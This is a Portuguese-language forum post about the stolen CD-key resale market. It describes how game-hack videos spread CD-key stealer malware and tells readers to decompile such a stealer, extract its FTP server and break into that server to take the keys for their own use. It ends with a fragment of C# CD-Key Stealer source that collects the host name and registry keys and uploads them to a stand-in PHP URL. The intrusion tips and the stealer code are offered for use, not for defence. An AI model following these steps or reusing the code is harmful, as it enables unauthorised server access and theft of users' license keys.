Unconfigured Ad Widget

Collapse

Anúncio

Collapse
No announcement yet.

CD-Key via Defacement

Collapse
X
 
  • Filter
  • Tempo
  • Show
Clear All
new posts

  • Font Size
    #1

    Dica CD-Key via Defacement

    Bom, vou fazer uma ajuda básica pro forum já que as coisas por aqui andam meio paradas.
    Estarei demonstrando um método de como conseguir uma CD-Key via defacement... Primeiramente me deixe explicar que com a grande massa de jogos em nosso mercado hoje em dia temos muitas pessoas interessadas em jogar, comprar, (re)vender. Porém, existe um mercado negro inserido nisso que poucos tem o conhecimento, o mercado que é chamado de revenda de CD-Keys roubadas, um mercado aonde um user x usa um programa x para capturar uma cd key x de um inocente e assim poder vende-la por um preço muito baixo (Por exemplo: 3 dólares).

    Enfim, tendo o conhecimento disso agora posso demonstrar como isso funciona:

    1- O possível "hacker" escreve em alguma linguagem como C e delphi uma source que chamam de "CD-Key Stealer" contendo neste uma série de códigos que captura uma key x de um programa x no registro da vítima e por fim envia para um servidor ftp bugado que fica fácil de ownar.

    2- Após o "hacker" tendo conhecimento da sua CD-Key, ele anuncia um shop privado de keys em algum forum de game hacking aí por fora.

    3- Por fim ele vende essa CD-Key muito barato e ainda consegue tirar algum dinheiro em cima disso.

    Agora que vocês entendem como o mercado negro de CD-Keys funcionam fica fácil de deduzir o que devemos fazer para ter acesso a essas CD-Keys para um beneficio própio ou para julgamento de atos sujos de um "hacker" correto? (cabe a vocês escolherem).

    Na prática:

    Bom, eu apenas darei o caminho de como chegar nesse FTP pois, muitos já estão "carecas" de saber que existem mil tutoriais de como passar pela a segurança de um servidor FTP não é?

    Agora que estamos mais antenados no assunto, vamos ao que interessa!

    1- Primeiro de tudo, você precisa de um alvo para trabalhar em cima então temos que ir no youtube achar nossa presa. Mas, por que o youtube tio blass? Bom, todo mundo já viu aqueles anuncios no youtube de hackers para jogos que em 99% das vezes o link que está na descrição para download é algum programa malicioso disposto a trazer danos ao seu desktop.
    O maior mercado de keys no momento é de Arma 2: Operation Arrowhead que em outras palavras é o famoso DayZ. Então nisso vamos procurar algum "hack" para o jogo no youtube (use a busca avançada para melhor resultados) recomendo sempre procurar por vídeos atualizados, upados a menos de 1 mês.

    2- Depois que achamos nosso vídeo "DayZ hack working 100%" ou alguma besteira do tipo, faremos o download do programa anunciado na descrição do vídeo que irá ser um Stealer que na hora que você clicar ele irá roubar sua cd-key. Então, NÃO CLIQUE!

    3- Use algum decompiler para capturar o servidor FTP dentro da source

    4- Invada o FTP e seja feliz.

    E por fim, minha dica termina aqui! Quero deixar claro que apenas mostrei o caminho porque não apoio o ensino preguiçoso aonde as pessoas dão tudo na mão de graça. Se você quer aprender, lute por isso
    Se alguém se interessa na source de um CD-Key stealer vou disponibilizar a parte de uma opensource.

    Código em C#:

    Código:
    namespace CD_Key_Stealer
    {
        class Program
        {
            const string phpScript = "http://something.com/stealer/index.php";
            static string keys = "";
    
            static void Main(string[] args)
            {
                keys = keys + "PC Name - " + Dns.GetHostName() + "\n";
                GetKeys();
                ResetKeys();
                UploadKeys();
            }
    
    Créditos da source: FreckleS
    Se for repostar, dê os devidos créditos ao autor.
    Color Our World Blackened.

    [Blackened - Metallica]


X
Working...
X